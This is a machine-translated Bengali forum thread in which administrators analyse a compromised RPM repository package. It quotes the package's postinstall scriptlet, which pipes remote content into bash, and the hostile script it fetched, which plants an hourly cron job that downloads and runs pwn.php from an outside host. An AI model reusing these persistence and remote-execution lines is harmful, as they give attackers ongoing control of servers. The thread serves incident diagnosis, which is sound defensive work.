কীভাবে এই আরপিএম ইনস্টল করে একটি ফাইল তৈরি হয়েছিল?

চলমান yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpmতৈরি করে /etc/cron.d/sysstat2তবে আরপিএম ফাইলটি অকার্যকর করে দেয়:

# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package

আরপিএম ফাইলটি কীভাবে তৈরি করেছিল এবং কীভাবে দেখি যে এটি কী করেছে?

# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1

https://www.getpagespeed.com/SCM/release-post-install.php রয়েছে:

#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2

আপনি আবিষ্কার করেছেন যে আরপিএমের স্ক্রিপ্টগুলি ইন্টারনেট থেকে একটি স্ক্রিপ্ট চালায় এবং সেই স্ক্রিপ্টটি বর্তমানে ম্যালওয়্যার কী হতে পারে তা পুনর্নির্দেশ করে। যদিও, আমি কোনও পে-লোডের কিছু খুঁজে পাচ্ছি না যা কিছু করে।

আরপিএম কী ঘটেছিল তা পুরোপুরি ট্র্যাক করতে পারে না কারণ এটি একটি স্বেচ্ছাসেবী স্ক্রিপ্ট চালাচ্ছে।

gpgcheck আপনাকে সাহায্য করবে না, উভয় getpagespeed-extras-7-6.el7.gps.noarch.rpmএবং getpagespeed-extras-release-7-1.el7.gps.noarch.rpmআপনি লিঙ্কযুক্ত উভয়ই বৈধ স্বাক্ষর রয়েছে বলে মনে হচ্ছে:

$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub  2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub  2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK

রেপো মালিকের কাছে অভিযোগ করুন যে প্যাকেজটি ইন্টারনেট থেকে স্বেচ্ছাসেবক কোড চালায়। যদি এটি অবশ্যই করতে হয় তবে তাদের সফ্টওয়্যার সরবরাহ শৃঙ্খলের সুরক্ষা উন্নত করা দরকার।

ইন্টারনেট অ্যাক্সেস ছাড়াই সফটওয়্যারটির প্রথম ইনস্টলটি করা বা "পোস্ট ইনস্টল" স্ক্রিপ্টটি ম্যানুয়ালি পরিদর্শন করা কিছুটা বিড়বিড় বলে মনে হচ্ছে। তবে দুর্ভাগ্যক্রমে প্যাকেজগুলি যদি এইভাবে খারাপ পরামর্শ দেওয়া কৌশল না করে তবে প্রায় প্রয়োজন বলে মনে হচ্ছে।

আমার কাছে পাঁচটি ক্লাউডলিনাক্স / সিপ্যানেল সার্ভার রয়েছে যা তাদের উপর এনজিট্রন হয়ে এনগিনেক্সের জন্য ব্যবহৃত ছিল তবে তারা এখন পরিবর্তে লাইটস্পিড ওয়েবসার্ভার চালায়। আমি মনে করি এনজিঙ্ক্রন এটি আনইনস্টল করার সময় পেজযুক্ত রেপোগুলি রেখে যেতে পারে। সিপ্যানেল প্রতি রাতে একটি আপডেট চেক চালায় এবং প্রায় মধ্যরাতে আমার সমস্ত সার্ভার আমাকে একটি ইমেল রিপোর্ট পাঠিয়েছিল:

/bin/sh: -c: line 0: syntax error near unexpected token `('
/bin/sh: -c: line 0: `/bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1'

পে-লোড সাইটের জন্য অনুসন্ধান আমাকে এখানে নিয়ে গেছে যেখানে আমি দেখতে পাই যে একই দিনে আপনার একই সমস্যা হয়েছিল। সুতরাং আপনার নিজের তথ্য আমার যোগ করতে। /etc/cron.d/sysstat2আমার সমস্ত সার্ভারে একই ফাইল বিদ্যমান।

আমি ফাইলটি মুছে ফেলেছি, রেপোগুলি সরিয়েছি এবং সমস্যাটি জানাতে গেটপেজস্পিডে যোগাযোগ ফর্মটি ব্যবহার করেছি। স্বাস্থ্য সংক্রান্ত সমস্যার কারণে তিনি রেপো বন্ধ করে দিচ্ছিলেন বলে একটি ব্লগ পোস্ট থাকায় রেপোর মালিক অ্যাডব্লিউএল হতে পারে। সুতরাং সম্ভবত আক্রমণকারীটি হয় যে রেপো মনোযোগ দিচ্ছে না, বা শোষণের জন্য একটি খোলা দরজা খুঁজে পেয়েছিল সে সুযোগটি নিয়েছিল।